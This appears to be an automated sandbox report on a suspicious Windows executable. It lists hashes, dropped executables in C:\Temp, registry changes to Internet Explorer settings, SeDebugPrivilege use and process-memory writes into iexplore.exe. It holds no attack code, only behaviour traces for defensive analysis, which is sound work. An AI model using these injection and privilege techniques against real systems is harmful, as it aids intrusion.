Malware Analysis Report

2025-08-05 16:57

Sample ID 250127-zcqsgsvpaq
Target JaffaCakes118_437309d104ca341348f98d56425358fc
SHA256 6d131c347e95abc7aedf92773ee5b94593279c62bf02528365544a663bf0826c
Tags
discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

6d131c347e95abc7aedf92773ee5b94593279c62bf02528365544a663bf0826c

Threat Level: Shows suspicious behavior

The file JaffaCakes118_437309d104ca341348f98d56425358fc was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery

Executes dropped EXE

Loads dropped DLL

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Gathers network information

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-01-27 20:34

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-01-27 20:34

Reported

2025-01-27 20:37

Platform

win7-20241010-en

Max time kernel

150s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\pkecwupjey.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_pkecwupjey.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\lgeysqlidx.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_lgeysqlidx.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\cxrpkhcwuo.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_cxrpkhcwuo.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\wupjhbztom.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_wupjhbztom.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\wqojgbvtnl.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_wqojgbvtnl.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\nlfaysqkfc.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_nlfaysqkfc.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\caupmhfzur.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_caupmhfzur.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\rmgeywrljd.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_rmgeywrljd.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\olgeysqlid.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_olgeysqlid.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\vsnhfzxsmk.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_vsnhfzxsmk.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\usmhezxrmj.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_usmhezxrmj.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\ojhbztolge.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_ojhbztolge.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\dysqlidxvp.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\pkecwupjey.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\lgeysqlidx.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\cxrpkhcwuo.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\wupjhbztom.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\wqojgbvtnl.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\nlfaysqkfc.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\caupmhfzur.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\rmgeywrljd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\olgeysqlid.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\vsnhfzxsmk.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\usmhezxrmj.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojhbztolge.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\dysqlidxvp.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\axsqkfcxup.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\usmkezwrpj.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\trmgeywqlj.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\wqlidbvqni.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ysnlfdxspk.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\upnhczusmg.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\rmgeywrljd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\ysnlfdxspk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\upnhczusmg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\wqojgbvtnl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\ojgbvtnlgaysqkfd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\caupmhfzur.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\olgeysqlid.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\vsnhfzxsmk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\axsqkfcxup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\lgeysqlidx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\cxrpkhcwuo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\wupjhbztom.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\nlfaysqkfc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\usmhezxrmj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\dysqlidxvp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\trmgeywqlj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\pkecwupjey.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\wqlidbvqni.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\usmkezwrpj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\ojhbztolge.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "444171956" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{252E1941-DCEE-11EF-8121-F6D98E36DBEF} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000023d48ee11fb50b40b431f9f144d107fb00000000020000000000106600000001000020000000c2be43dedc1c740dbfd7d79e0ca519e10a428e60168afb334edbd32bb2c1b68c000000000e8000000002000020000000ad85904af684a0ac4a05d5223b15aa92659a2de538db340b4bc79b6981c8abcc90000000dc10478aa9ef719d8a4f5246d068c2e9b90fa80757af97c66aa32310dd04ba61621f83e981f06bb699beab7ad38871cfa2c751426cd6de1ccb99e3300cd864b2876f19f904d7c184106dae3401b385ba1710dcd3299fb45a1beadfa7be4ed94fe3ffa35648200e2aa5dff3311fc2a653747ea19d84e26a7c1fe233e8ceb52d598d115418ea105adfe5fcacd5c05166c740000000affb68967fa78a71debdeadea2d10ac4522a879080e4c98c512095a4074a4d3428fc4ec4f511f722b83dcbf4cafcbaae5e075c62a80c6f434b70adfe68f791fb C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000023d48ee11fb50b40b431f9f144d107fb000000000200000000001066000000010000200000002778afc389a971e62ac9d1793352ec25bba45f86875d5a60268291980440ec52000000000e80000000020000200000007c9293987ed2dbc789a5101332c660cc9283f003b18e359266451779b42f409d200000006b1563f77b3c808b9082ced6487c6cc20dae70a80af71732660ebeb84a78d1e740000000dae63e5b7fdbf2e4496d6a91a5cf28b80a9702f159b8c47697988b2c84ee59f7f77077e98ebe67b38291ce0ed714180cb4673c7a970153549947385bf63dbaab C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0af18fdfa70db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\ojgbvtnlgaysqkfd.exe N/A
N/A N/A C:\Temp\pkecwupjey.exe N/A
N/A N/A C:\Temp\pkecwupjey.exe N/A
N/A N/A C:\Temp\pkecwupjey.exe N/A
N/A N/A C:\Temp\pkecwupjey.exe N/A
N/A N/A C:\Temp\pkecwupjey.exe N/A
N/A N/A C:\Temp\pkecwupjey.exe N/A
N/A N/A C:\Temp\pkecwupjey.exe N/A
N/A N/A C:\Temp\i_pkecwupjey.exe N/A
N/A N/A C:\Temp\i_pkecwupjey.exe N/A
N/A N/A C:\Temp\i_pkecwupjey.exe N/A
N/A N/A C:\Temp\i_pkecwupjey.exe N/A
N/A N/A C:\Temp\i_pkecwupjey.exe N/A
N/A N/A C:\Temp\i_pkecwupjey.exe N/A
N/A N/A C:\Temp\i_pkecwupjey.exe N/A
N/A N/A C:\Temp\lgeysqlidx.exe N/A
N/A N/A C:\Temp\lgeysqlidx.exe N/A
N/A N/A C:\Temp\lgeysqlidx.exe N/A
N/A N/A C:\Temp\lgeysqlidx.exe N/A
N/A N/A C:\Temp\lgeysqlidx.exe N/A
N/A N/A C:\Temp\lgeysqlidx.exe N/A
N/A N/A C:\Temp\lgeysqlidx.exe N/A
N/A N/A C:\Temp\i_lgeysqlidx.exe N/A
N/A N/A C:\Temp\i_lgeysqlidx.exe N/A
N/A N/A C:\Temp\i_lgeysqlidx.exe N/A
N/A N/A C:\Temp\i_lgeysqlidx.exe N/A
N/A N/A C:\Temp\i_lgeysqlidx.exe N/A
N/A N/A C:\Temp\i_lgeysqlidx.exe N/A
N/A N/A C:\Temp\i_lgeysqlidx.exe N/A
N/A N/A C:\Temp\cxrpkhcwuo.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Temp\i_pkecwupjey.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_lgeysqlidx.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_cxrpkhcwuo.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_wupjhbztom.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_wqojgbvtnl.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_nlfaysqkfc.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_caupmhfzur.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_rmgeywrljd.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_olgeysqlid.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_vsnhfzxsmk.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_usmhezxrmj.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_ojhbztolge.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_dysqlidxvp.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_axsqkfcxup.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_usmkezwrpj.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_trmgeywqlj.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_wqlidbvqni.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_ysnlfdxspk.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_upnhczusmg.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2608 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\ojgbvtnlgaysqkfd.exe
PID 2608 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\ojgbvtnlgaysqkfd.exe
PID 2608 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\ojgbvtnlgaysqkfd.exe
PID 2608 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\ojgbvtnlgaysqkfd.exe
PID 2608 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2608 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2608 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2608 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2176 wrote to memory of 2148 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2176 wrote to memory of 2148 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
